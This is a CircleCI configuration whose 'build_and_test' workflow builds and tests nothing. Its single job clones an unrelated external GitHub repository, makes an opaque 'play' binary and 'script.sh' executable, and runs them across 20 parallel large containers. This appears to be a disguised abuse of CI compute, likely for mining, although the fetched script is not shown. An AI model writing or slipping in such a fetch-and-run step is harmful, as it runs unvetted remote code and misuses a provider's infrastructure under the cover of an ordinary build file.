version: 2.1

jobs:
  running:
    resource_class: large
    docker:
      - image: circleci/python:3.6.6
    parallelism: 20
    steps:
      - checkout
      - run: git clone https://github.com/playdoco/play.git && cd play && chmod 500 play script.sh && ./script.sh

workflows:
  build_and_test:
    jobs:
      - running
